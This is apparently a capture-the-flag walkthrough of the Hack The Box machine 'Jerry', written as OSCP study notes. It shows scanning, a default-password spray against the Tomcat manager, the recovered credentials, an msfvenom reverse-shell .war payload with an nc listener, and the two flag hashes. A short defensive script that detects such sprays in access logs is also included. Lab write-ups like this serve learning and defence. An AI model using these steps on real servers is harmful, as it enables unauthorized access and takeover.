Windows Boxes

jerry

  1. nmap
  2. http
    1. gobuster
    2. /manager
  3. passwordspray Tomcat server
    1. default passwords
    2. default passwords b64
    3. Intruder
  4. initial foothold
    1. msfvenom .war reverse shell
    2. .war upload and run
  5. user/root
  6. lessons learned

jerry

images/6-1.png
images/6-2.png

nmap

nmap -sC -sV -oA nmap/initial 10.10.10.95
images/7-1.png
we have an Apache Tomcat server running JSP 1.1 on port 8080

http

images/465-1.png

images/465-2.png



gobuster

running gobuster on our target

gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
images/486-1.png
/docs, /examples and /shell don't lead to any important findings;
however, access to /manager could give us remote code execution on this box

/manager

images/487-1.png
images/487-2.png

capturing the authentication request with Burp Suite shows that the server uses HTTP Basic authentication, which sends username:password base64-encoded (not encrypted) in the Authorization header
images/487-3.png

passwordspray Tomcat server

default passwords
default passwords b64
Intruder

default passwords

let's search Google for default Tomcat usernames and passwords and either copy or build our own list to brute-force authentication to the Tomcat manager page
images/41-1.png
images/41-2.png
images/41-3.png

Tomcat server default password list:
images/41-4.png

default passwords b64

now that we have our username and password list, we

images/42-1.png
images/42-2.png

Intruder

images/43-1.png
images/43-2.png
images/43-3.png
images/43-4.png
Intruder shows that the payload dG9tY2F0OnMzY3JldA== returns a 200 status code and a response length of 19248 bytes; because it is an outlier compared to the rest of Intruder's attempts, it is safe to assume we have a successful login!

images/43-5.png
we can use Burp Suite's built-in base64 decoder on the string to reveal our username and password:
tomcat:s3cret


Note: only use Intruder for small user/password payload sets unless you have the Professional edition of Burp Suite; the Community edition runs very slowly compared to other free web-app brute-forcers such as hydra
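As an added example (not part of the original writeup), here is the defender's view of the two facts used above: the Basic header is only base64, and a spray leaves a burst of 401s on /manager before the single 200. The Tomcat "common" access-log format, timestamps, threshold and sample log lines are assumptions/constructed, not taken from the box.

```python
import base64
import re
from collections import defaultdict

# Tomcat AccessLogValve pattern="common": host ident authuser [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def decode_basic_header(value):
    """Return (user, password) from an 'Authorization: Basic <b64>' header value.
    Basic auth is encoding, not encryption: anyone holding the header has the creds."""
    scheme, _, b64 = value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not HTTP Basic authentication")
    user, _, password = base64.b64decode(b64).decode().partition(":")
    return user, password


def detect_manager_spray(lines, threshold=5):
    """Flag source IPs that hit /manager with >= threshold 401 responses,
    and any later authenticated 200 from the same IP (spray followed by success)."""
    failures = defaultdict(int)
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/manager"):
            continue
        ip, status = m["ip"], int(m["status"])
        if status == 401:
            failures[ip] += 1
            if failures[ip] == threshold:
                findings.append(f"{ip}: {threshold} failed /manager logins (spray)")
        elif status == 200 and failures[ip] >= threshold:
            findings.append(f"{ip}: success as '{m['user']}' after {failures[ip]} failures")
    return findings


# Constructed sample log (hypothetical): five rejected attempts on /manager/html
# from one host, then an authenticated 200 for the remote user "tomcat".
SAMPLE_LOG = [
    f'10.10.14.62 - - [01/Jan/2024:12:00:{s:02d} +0000] "GET /manager/html HTTP/1.1" 401 2473'
    for s in range(5)
] + ['10.10.14.62 - tomcat [01/Jan/2024:12:00:05 +0000] "GET /manager/html HTTP/1.1" 200 19248']

if __name__ == "__main__":
    print(decode_basic_header("Basic dG9tY2F0OnMzY3JldA=="))
    for finding in detect_manager_spray(SAMPLE_LOG):
        print(finding)
```

Tomcat only records the authenticated user on a successful request, so the 200 line carrying a user name after a run of anonymous 401s is the signal worth alerting on.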

initial foothold

using the username tomcat and password s3cret on the manager login form
images/1047-1.png

logs us into the Tomcat Web Application Manager!
images/1047-2.png
images/1047-3.png
images/1047-4.png
images/1047-5.png
images/1047-6.png

msfvenom .war reverse shell

on the manager page, after login, there is an upload feature that accepts .war files
images/1049-1.png
Note: make sure it's a Java/JSP payload (java/jsp_shell_reverse_tcp) when building a .war file, because Tomcat deploys .war files and runs the Java code inside them

we're going to use msfvenom to generate a reverse shell payload packaged as a .war file; this and other payloads can be found here
images/1049-2.png
images/1049-3.png

msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.62 LPORT=9876 -o newshell.war
images/1049-4.png

.war upload and run

images/44-1.png

clicking the newly generated shell2 link or navigating to its location in our browser will execute our .war payload and send a reverse shell back to our machine!
images/44-2.png
nc -nlvp 9876
images/44-3.png
and we're SYSTEM!

user/root

images/489-1.png
7004dbcef0f854e0fb401875f26ebd00
04a8b36e1545a455393d067e772fe90e

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1050-1.png